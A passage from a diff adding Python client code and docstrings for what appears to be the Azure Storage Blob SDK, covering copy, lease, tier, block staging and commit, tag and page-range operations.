prefix of the source_authorization string. 
This option is only available when `incremental_copy` is + set to False and `requires_sync` is set to True. + + .. versionadded:: 12.9.0 + + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the sync copied blob. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.10.0 + + :returns: A dictionary of copy properties (etag, last_modified, copy_id, copy_status). + :rtype: dict[str, Union[str, ~datetime.datetime]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START copy_blob_from_url] + :end-before: [END copy_blob_from_url] + :language: python + :dedent: 12 + :caption: Copy a blob from a URL. + """ + options = self._start_copy_from_url_options( + source_url=self._encode_source_url(source_url), + metadata=metadata, + incremental_copy=incremental_copy, + **kwargs) + try: + if incremental_copy: + return self._client.page_blob.copy_incremental(**options) + return self._client.blob.start_copy_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + def _abort_copy_options(self, copy_id, **kwargs): + # type: (Union[str, Dict[str, Any], BlobProperties], **Any) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + try: + copy_id = copy_id.copy.id + except AttributeError: + try: + copy_id = copy_id['copy_id'] + except TypeError: + pass + options = { + 'copy_id': copy_id, + 'lease_access_conditions': access_conditions, + 'timeout': kwargs.pop('timeout', None)} + options.update(kwargs) + return options + + @distributed_trace + def abort_copy(self, copy_id, **kwargs): + # type: (Union[str, Dict[str, Any], BlobProperties], **Any) -> None + """Abort an ongoing copy operation. + + This will leave a destination blob with zero length and full metadata. + This will raise an error if the copy operation has already ended. + + :param copy_id: + The copy operation to abort. This can be either an ID string, or an + instance of BlobProperties. + :type copy_id: str or ~azure.storage.blob.BlobProperties + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START abort_copy_blob_from_url] + :end-before: [END abort_copy_blob_from_url] + :language: python + :dedent: 12 + :caption: Abort copying a blob from URL. + """ + options = self._abort_copy_options(copy_id, **kwargs) + try: + self._client.blob.abort_copy_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def acquire_lease(self, lease_duration=-1, lease_id=None, **kwargs): + # type: (int, Optional[str], **Any) -> BlobLeaseClient + """Requests a new lease. + + If the blob does not have an active lease, the Blob + Service creates a lease on the blob and returns a new lease. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :param str lease_id: + Proposed lease ID, in a GUID string format. 
The Blob Service
+            returns 400 (Invalid request) if the proposed lease ID is not
+            in the correct format.
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blob with a matching value.
+            eg. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: A BlobLeaseClient object.
+        :rtype: ~azure.storage.blob.BlobLeaseClient
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_common.py
+                :start-after: [START acquire_lease_on_blob]
+                :end-before: [END acquire_lease_on_blob]
+                :language: python
+                :dedent: 8
+                :caption: Acquiring a lease on a blob.
+        """
+        lease = BlobLeaseClient(self, lease_id=lease_id)  # type: ignore
+        lease.acquire(lease_duration=lease_duration, **kwargs)
+        return lease
+
+    @distributed_trace
+    def set_standard_blob_tier(self, standard_blob_tier, **kwargs):
+        # type: (Union[str, StandardBlobTier], Any) -> None
+        """This operation sets the tier on a block blob.
+
+        A block blob's tier determines Hot/Cool/Archive storage type.
+        This operation does not update the blob's ETag.
+
+        :param standard_blob_tier:
+            Indicates the tier to be set on the blob. Options include 'Hot', 'Cool',
+            'Archive'. The hot tier is optimized for storing data that is accessed
+            frequently. The cool storage tier is optimized for storing data that
+            is infrequently accessed and stored for at least a month. The archive
+            tier is optimized for storing data that is rarely accessed and stored
+            for at least six months with flexible latency requirements.
+        :type standard_blob_tier: str or ~azure.storage.blob.StandardBlobTier
+        :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority:
+            Indicates the priority with which to rehydrate an archived blob
+        :keyword str version_id:
+            The version id parameter is an opaque DateTime
+            value that, when present, specifies the version of the blob whose tier is to be set.
+
+            .. versionadded:: 12.4.0
+            This keyword argument was introduced in API version '2019-12-12'.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blob with a matching value.
+            eg. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+ :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :rtype: None + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if standard_blob_tier is None: + raise ValueError("A StandardBlobTier must be specified") + if self.snapshot and kwargs.get('version_id'): + raise ValueError("Snapshot and version_id cannot be set at the same time") + try: + self._client.blob.set_tier( + tier=standard_blob_tier, + snapshot=self.snapshot, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + lease_access_conditions=access_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + def _stage_block_options( + self, block_id, # type: str + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + block_id = encode_base64(str(block_id)) + if isinstance(data, six.text_type): + data = data.encode(kwargs.pop('encoding', 'UTF-8')) # type: ignore + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + if length is None: + length = get_length(data) + if length is None: + length, data = read_length(data) + if isinstance(data, bytes): + data = data[:length] + + validate_content = kwargs.pop('validate_content', False) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'block_id': block_id, + 'content_length': length, + 'body': data, + 'transactional_content_md5': None, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'validate_content': validate_content, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers, + } + options.update(kwargs) + return options + + @distributed_trace + def stage_block( + self, block_id, # type: str + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Any] + """Creates a new block to be committed as part of a blob. + + :param str block_id: A string value that identifies the block. + The string should be less than or equal to 64 bytes in size. + For a given blob, the block_id must be the same size for each block. + :param data: The blob data. + :param int length: Size of the block. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. 
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword str encoding:
+            Defaults to UTF-8.
+        :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+            Encrypts the data on the service-side with the given key.
+            Use of customer-provided keys must be done over HTTPS.
+            As the encryption key itself is provided in the request,
+            a secure connection must be established to transfer the key.
+        :keyword str encryption_scope:
+            A predefined encryption scope used to encrypt the data on the service. An encryption
+            scope can be created using the Management API and referenced here by name. If a default
+            encryption scope has been defined at the container, this value will override it if the
+            container-level scope is configured to allow overrides. Otherwise an error will be raised.
+
+            .. versionadded:: 12.2.0
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Blob property dict.
+        :rtype: dict[str, Any]
+        """
+        options = self._stage_block_options(
+            block_id,
+            data,
+            length=length,
+            **kwargs)
+        try:
+            return self._client.block_blob.stage_block(**options)
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    def _stage_block_from_url_options(
+            self, block_id,  # type: str
+            source_url,  # type: str
+            source_offset=None,  # type: Optional[int]
+            source_length=None,  # type: Optional[int]
+            source_content_md5=None,  # type: Optional[Union[bytes, bytearray]]
+            **kwargs
+    ):
+        # type: (...) -> Dict[str, Any]
+        source_authorization = kwargs.pop('source_authorization', None)
+        if source_length is not None and source_offset is None:
+            raise ValueError("Source offset value must not be None if length is set.")
+        if source_length is not None:
+            source_length = source_offset + source_length - 1
+        block_id = encode_base64(str(block_id))
+        access_conditions = get_access_conditions(kwargs.pop('lease', None))
+        range_header = None
+        if source_offset is not None:
+            range_header, _ = validate_and_format_range_headers(source_offset, source_length)
+
+        cpk_scope_info = get_cpk_scope_info(kwargs)
+        cpk = kwargs.pop('cpk', None)
+        cpk_info = None
+        if cpk:
+            if self.scheme.lower() != 'https':
+                raise ValueError("Customer provided encryption key must be used over HTTPS.")
+            cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash,
+                               encryption_algorithm=cpk.algorithm)
+        options = {
+            'copy_source_authorization': source_authorization,
+            'block_id': block_id,
+            'content_length': 0,
+            'source_url': source_url,
+            'source_range': range_header,
+            'source_content_md5': bytearray(source_content_md5) if source_content_md5 else None,
+            'timeout': kwargs.pop('timeout', None),
+            'lease_access_conditions': access_conditions,
+            'cpk_scope_info': cpk_scope_info,
+            'cpk_info': cpk_info,
+            'cls': return_response_headers,
+        }
+        options.update(kwargs)
+        return options
+
+    @distributed_trace
+    def stage_block_from_url(
+            self, block_id,  # type: Union[str, int]
+            source_url,  # type: str
+            source_offset=None,  # type: Optional[int]
+            source_length=None,  # type: Optional[int]
+            source_content_md5=None,  # type: Optional[Union[bytes, bytearray]]
+            **kwargs
+    ):
+        # type: (...) -> Dict[str, Any]
+        """Creates a new block to be committed as part of a blob where
+        the contents are read from a URL.
+
+        :param str block_id: A string value that identifies the block.
+            The string should be less than or equal to 64 bytes in size.
+            For a given blob, the block_id must be the same size for each block.
+        :param str source_url:
+            The URL of the source data. It can point to any Azure Blob or File
+            that is either public or has a shared access signature attached.
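+
+        .. admonition:: Example (illustrative sketch):
+
+            A minimal sketch, assuming ``blob_client`` is an existing ``BlobClient``
+            and ``source_blob_url`` is a public or SAS-authenticated source URL;
+            both names are hypothetical::
+
+                import uuid
+
+                block_id = str(uuid.uuid4())
+                blob_client.stage_block_from_url(
+                    block_id, source_blob_url, source_offset=0, source_length=512)
+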
+ :param int source_offset: + Start of byte range to use for the block. + Must be set if source length is provided. + :param int source_length: The size of the block in bytes. + :param bytearray source_content_md5: + Specify the md5 calculated for the range of + bytes that must be read from the copy source. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + :returns: Blob property dict. + :rtype: dict[str, Any] + """ + options = self._stage_block_from_url_options( + block_id, + source_url=self._encode_source_url(source_url), + source_offset=source_offset, + source_length=source_length, + source_content_md5=source_content_md5, + **kwargs) + try: + return self._client.block_blob.stage_block_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + def _get_block_list_result(self, blocks): + # type: (BlockList) -> Tuple[List[BlobBlock], List[BlobBlock]] + committed = [] # type: List + uncommitted = [] # type: List + if blocks.committed_blocks: + committed = [BlobBlock._from_generated(b) for b in blocks.committed_blocks] # pylint: disable=protected-access + if blocks.uncommitted_blocks: + uncommitted = [BlobBlock._from_generated(b) for b in blocks.uncommitted_blocks] # pylint: disable=protected-access + return committed, uncommitted + + @distributed_trace + def get_block_list(self, block_list_type="committed", **kwargs): + # type: (Optional[str], **Any) -> Tuple[List[BlobBlock], List[BlobBlock]] + """The Get Block List operation retrieves the list of blocks that have + been uploaded as part of a block blob. + + :param str block_list_type: + Specifies whether to return the list of committed + blocks, the list of uncommitted blocks, or both lists together. + Possible values include: 'committed', 'uncommitted', 'all' + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on destination blob with a matching value. + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. 
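+
+        .. admonition:: Example (illustrative sketch):
+
+            A minimal sketch, assuming ``blob_client`` is an existing ``BlobClient``
+            (a hypothetical name)::
+
+                committed, uncommitted = blob_client.get_block_list("all")
+                for block in committed:
+                    print(block.id, block.size)
+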
+ :returns: A tuple of two lists - committed and uncommitted blocks + :rtype: tuple(list(~azure.storage.blob.BlobBlock), list(~azure.storage.blob.BlobBlock)) + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + try: + blocks = self._client.block_blob.get_block_list( + list_type=block_list_type, + snapshot=self.snapshot, + timeout=kwargs.pop('timeout', None), + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return self._get_block_list_result(blocks) + + def _commit_block_list_options( # type: ignore + self, block_list, # type: List[BlobBlock] + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + block_lookup = BlockLookupList(committed=[], uncommitted=[], latest=[]) + for block in block_list: + try: + if block.state.value == 'committed': + block_lookup.committed.append(encode_base64(str(block.id))) + elif block.state.value == 'uncommitted': + block_lookup.uncommitted.append(encode_base64(str(block.id))) + else: + block_lookup.latest.append(encode_base64(str(block.id))) + except AttributeError: + block_lookup.latest.append(encode_base64(str(block))) + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + blob_headers = None + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if content_settings: + blob_headers = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + + validate_content = kwargs.pop('validate_content', False) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + immutability_policy = kwargs.pop('immutability_policy', None) + if immutability_policy: + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + + tier = kwargs.pop('standard_blob_tier', None) + blob_tags_string = serialize_blob_tags_header(kwargs.pop('tags', None)) + + options = { + 'blocks': block_lookup, + 'blob_http_headers': blob_headers, + 'lease_access_conditions': access_conditions, + 'timeout': kwargs.pop('timeout', None), + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers, + 'validate_content': validate_content, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'tier': tier.value if tier else None, + 'blob_tags_string': blob_tags_string, + 'headers': headers + } + options.update(kwargs) + return options + + @distributed_trace + def commit_block_list( # type: ignore + self, block_list, # type: List[BlobBlock] + content_settings=None, # type: 
Optional[ContentSettings]
+            metadata=None,  # type: Optional[Dict[str, str]]
+            **kwargs
+    ):
+        # type: (...) -> Dict[str, Union[str, datetime]]
+        """The Commit Block List operation writes a blob by specifying the list of
+        block IDs that make up the blob.
+
+        :param list block_list:
+            List of BlobBlock objects identifying the blocks to commit.
+        :param ~azure.storage.blob.ContentSettings content_settings:
+            ContentSettings object used to set blob properties. Used to set content type, encoding,
+            language, disposition, md5, and cache control.
+        :param metadata:
+            Name-value pairs associated with the blob as metadata.
+        :type metadata: dict[str, str]
+        :keyword tags:
+            Name-value pairs associated with the blob as tag. Tags are case-sensitive.
+            The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters,
+            and tag values must be between 0 and 256 characters.
+            Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9),
+            space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_)
+
+            .. versionadded:: 12.4.0
+
+        :paramtype tags: dict(str, str)
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy:
+            Specifies the immutability policy of a blob, blob snapshot or blob version.
+
+            .. versionadded:: 12.10.0
+                This was introduced in API version '2020-10-02'.
+
+        :keyword bool legal_hold:
+            Specifies whether a legal hold should be set on the blob.
+
+            .. versionadded:: 12.10.0
+                This was introduced in API version '2020-10-02'.
+
+        :keyword bool validate_content:
+            If true, calculates an MD5 hash of the block list content. The storage
+            service checks the hash of the content that has arrived
+            with the hash that was sent. This is primarily valuable for detecting
+            bitflips on the wire if using http instead of https, as https (the default),
+            will already validate. Note that this MD5 hash is not stored with the
+            blob.
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on destination blob with a matching value.
+
+            .. versionadded:: 12.4.0
+
+        :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier:
+            A standard blob tier value to set the blob to. For this version of the library,
+            this is only applicable to block blobs on standard storage accounts.
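+
+        .. admonition:: Example (illustrative sketch):
+
+            A minimal sketch that stages two blocks and commits them in order,
+            assuming ``blob_client`` is an existing ``BlobClient`` (a hypothetical
+            name)::
+
+                from azure.storage.blob import BlobBlock
+
+                blob_client.stage_block("block-1", b"hello ")
+                blob_client.stage_block("block-2", b"world")
+                blob_client.commit_block_list(
+                    [BlobBlock("block-1"), BlobBlock("block-2")])
+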
+ :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._commit_block_list_options( + block_list, + content_settings=content_settings, + metadata=metadata, + **kwargs) + try: + return self._client.block_blob.commit_block_list(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def set_premium_page_blob_tier(self, premium_page_blob_tier, **kwargs): + # type: (Union[str, PremiumPageBlobTier], **Any) -> None + """Sets the page blob tiers on the blob. This API is only supported for page blobs on premium accounts. + + :param premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :type premium_page_blob_tier: ~azure.storage.blob.PremiumPageBlobTier + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :rtype: None + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if premium_page_blob_tier is None: + raise ValueError("A PremiumPageBlobTier must be specified") + try: + self._client.blob.set_tier( + tier=premium_page_blob_tier, + timeout=kwargs.pop('timeout', None), + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + def _set_blob_tags_options(self, tags=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + tags = serialize_blob_tags(tags) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + + options = { + 'tags': tags, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def set_blob_tags(self, tags=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + """The Set Tags operation enables users to set tags on a blob or specific blob version, but not snapshot. 
+        Each call to this operation replaces all existing tags attached to the blob. To remove all
+        tags from the blob, call this operation with no tags set.
+
+        .. versionadded:: 12.4.0
+            This operation was introduced in API version '2019-12-12'.
+
+        :param tags:
+            Name-value pairs associated with the blob as tag. Tags are case-sensitive.
+            The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters,
+            and tag values must be between 0 and 256 characters.
+            Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9),
+            space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_)
+        :type tags: dict(str, str)
+        :keyword str version_id:
+            The version id parameter is an opaque DateTime
+            value that, when present, specifies the version of the blob to add tags to.
+        :keyword bool validate_content:
+            If true, calculates an MD5 hash of the tags content. The storage
+            service checks the hash of the content that has arrived
+            with the hash that was sent. This is primarily valuable for detecting
+            bitflips on the wire if using http instead of https, as https (the default),
+            will already validate. Note that this MD5 hash is not stored with the
+            blob.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on destination blob with a matching value.
+            eg. ``\"\\\"tagname\\\"='my tag'\"``
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Blob-updated property dict (Etag and last modified)
+        :rtype: Dict[str, Any]
+        """
+        options = self._set_blob_tags_options(tags=tags, **kwargs)
+        try:
+            return self._client.blob.set_tags(**options)
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    def _get_blob_tags_options(self, **kwargs):
+        # type: (**Any) -> Dict[str, str]
+        access_conditions = get_access_conditions(kwargs.pop('lease', None))
+        mod_conditions = get_modify_conditions(kwargs)
+
+        options = {
+            'version_id': kwargs.pop('version_id', None),
+            'snapshot': self.snapshot,
+            'lease_access_conditions': access_conditions,
+            'modified_access_conditions': mod_conditions,
+            'timeout': kwargs.pop('timeout', None),
+            'cls': return_headers_and_deserialized}
+        return options
+
+    @distributed_trace
+    def get_blob_tags(self, **kwargs):
+        # type: (**Any) -> Dict[str, str]
+        """The Get Tags operation enables users to get tags on a blob, a specific blob version, or a snapshot.
+
+        .. versionadded:: 12.4.0
+            This operation was introduced in API version '2019-12-12'.
+
+        :keyword str version_id:
+            The version id parameter is an opaque DateTime
+            value that, when present, specifies the version of the blob to get tags from.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on destination blob with a matching value.
+            eg. ``\"\\\"tagname\\\"='my tag'\"``
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Key value pairs of blob tags.
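+
+        .. admonition:: Example (illustrative sketch):
+
+            A minimal sketch that round-trips tags, assuming ``blob_client`` is an
+            existing ``BlobClient`` (a hypothetical name)::
+
+                blob_client.set_blob_tags({"project": "demo", "stage": "test"})
+                tags = blob_client.get_blob_tags()  # {'project': 'demo', 'stage': 'test'}
+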
+ :rtype: Dict[str, str] + """ + options = self._get_blob_tags_options(**kwargs) + try: + _, tags = self._client.blob.get_tags(**options) + return parse_tags(tags) # pylint: disable=protected-access + except HttpResponseError as error: + process_storage_error(error) + + def _get_page_ranges_options( # type: ignore + self, offset=None, # type: Optional[int] + length=None, # type: Optional[int] + previous_snapshot_diff=None, # type: Optional[Union[str, Dict[str, Any]]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if length is not None and offset is None: + raise ValueError("Offset value must not be None if length is set.") + if length is not None: + length = offset + length - 1 # Reformat to an inclusive range index + page_range, _ = validate_and_format_range_headers( + offset, length, start_range_required=False, end_range_required=False, align_to_page=True + ) + options = { + 'snapshot': self.snapshot, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'timeout': kwargs.pop('timeout', None), + 'range': page_range} + if previous_snapshot_diff: + try: + options['prevsnapshot'] = previous_snapshot_diff.snapshot # type: ignore + except AttributeError: + try: + options['prevsnapshot'] = previous_snapshot_diff['snapshot'] # type: ignore + except TypeError: + options['prevsnapshot'] = previous_snapshot_diff + options.update(kwargs) + return options + + @distributed_trace + def get_page_ranges( # type: ignore + self, offset=None, # type: Optional[int] + length=None, # type: Optional[int] + previous_snapshot_diff=None, # type: Optional[Union[str, Dict[str, Any]]] + **kwargs + ): + # type: (...) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]] + """DEPRECATED: Returns the list of valid page ranges for a Page Blob or snapshot + of a page blob. + + :param int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param str previous_snapshot_diff: + The snapshot diff parameter that contains an opaque DateTime value that + specifies a previous blob snapshot to be compared + against a more recent snapshot or the current blob. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. 
